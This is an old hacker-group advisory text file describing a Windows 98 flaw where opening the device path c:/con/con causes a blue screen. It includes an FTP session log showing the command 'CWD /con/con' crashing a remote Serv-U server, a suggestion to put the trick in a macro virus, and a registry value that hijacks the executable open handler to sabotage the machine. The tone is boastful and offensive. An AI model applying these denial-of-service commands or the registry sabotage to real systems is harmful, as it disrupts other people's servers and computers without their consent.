win98-con.txt

`New exploit found by the securax crew on 3/3/error  
  
for: windoze 98 maybe 95 too...  
not for NT4 or win2K  
  
When we looked at the new exploit for ie that uses the image c:/con/con   
(http://www.zoomnet.net/~quick/error/crash.html)  
  
we experimented a bit with that unexisting path.  
We found that any program in windows 98 will crash if you try to open that file.  
eg: try Start --> run --> c:/con/con  
or open in Word the non-existing document c:/con/con  
both attempts will result in en Blues Screen of death and a lockup.  
  
  
This can also be exploited to crash remote servers  
Look what we tryed on this servU-FTP v 2.4a  
(works on any windoze 98 FTP even with anonyous or guest account)  
  
it looked something like this:  
  
230 user logged in, proceed  
SYST  
215 UNIX TYPE:L8  
connect ok!  
PWD  
257 "c:/home" is current directory.  
haal directory op  
TYPE A  
200 Type set to A.  
PORT xx.xx.xx.xx :-)  
200 PORT Command succesful  
LIST  
150 Opening ASCII mode data connect  
Download: 86 bytes  
Wacht op de server  
226 transfer complete  
CDUP  
250 directory changed to /c:/  
PWD  
250 "/c:/" is current directory  
CWD /con/con --> this does the trick  
  
...   
no more response :-) server crashed.  
  
  
This is probably just the beginning of a new series of exploits for windoze.  
this little flaw could easily be used in a macro virus. maybe even be placed in the registry  
  
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open  
c:\con\con "%1" %*  
  
  
Da G#Df@RTER & Pathos (securax)   
  
www.securax.org  
  
`